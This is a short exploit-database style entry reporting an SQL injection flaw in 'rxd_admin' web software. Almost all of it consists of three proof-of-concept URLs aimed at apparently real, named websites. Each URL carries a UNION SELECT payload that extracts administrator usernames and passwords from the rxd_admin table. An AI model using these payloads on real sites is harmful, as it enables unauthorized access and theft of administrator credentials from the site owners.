-------------------------------------------------------------*
#Exploit Title: rxd_admin - SQL Injection vulnerability
#Date: 2020-09-03
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo 1:
http://uccc2019.ir/main/page.php?id=-4%27%20union%20select%201,group_concat(user,%27%3Cbr%3E%27,pass),3,4,5%20from%20rxd_admin--+
Demo 2:
http://www.eapec2018.ir/main/en/page.php?id=-44%27%20union%20select%201,2,3,4,group_concat(user,%27%3Cbr%3E%27,pass)%20from%20rxd_admin--+
Demo 3:
https://nutrclinic.ir/main/page.php?id=-5%27%20union%20select%201,group_concat(user,%27%3Cbr%3E%27,pass),3,4,5%20from%20rxd_admin--+
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*